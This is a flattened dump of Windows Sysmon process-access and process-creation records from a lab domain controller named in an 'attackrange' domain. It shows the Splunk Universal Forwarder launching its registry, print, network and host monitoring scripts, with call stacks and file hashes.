12:02:58.403{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-64F2-6064-FD00-00000000AE01}6844C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.403{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F2-6064-FD00-00000000AE01}6844C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.405{266CAFBE-64F2-6064-FD00-00000000AE01}6844C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinRegMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.294{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F2-6064-FC00-00000000AE01}6852C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.294{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.294{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.294{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.294{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.294{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-64F2-6064-FC00-00000000AE01}6852C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.294{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F2-6064-FC00-00000000AE01}6852C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.296{266CAFBE-64F2-6064-FC00-00000000AE01}6852C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinPrintMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.185{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F2-6064-FB00-00000000AE01}6952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.185{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008432Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.185{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008431Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.185{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008430Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.185{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008429Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.185{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F2-6064-FB00-00000000AE01}6952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008428Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.185{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F2-6064-FB00-00000000AE01}6952C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008427Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.187{266CAFBE-64F2-6064-FB00-00000000AE01}6952C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinNetMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008426Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.076{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F2-6064-FA00-00000000AE01}6940C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008425Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.076{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008424Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.076{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.076{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.076{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:58.076{266CAFBE-6469-6064-0500-00000000AE01}624740C:\Windows\system32\csrss.exe{266CAFBE-64F2-6064-FA00-00000000AE01}6940C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000008420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.076{266CAFBE-64ED-6064-D500-00000000AE01}56486600C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-64F2-6064-FA00-00000000AE01}6940C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000008419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:58.079{266CAFBE-64F2-6064-FA00-00000000AE01}6940C:\Windows\System32\cmd.exe10.0.14393.0 
(rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinHostMon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000008490Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:59.666{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-64F3-6064-0201-00000000AE01}1828C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000008489Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 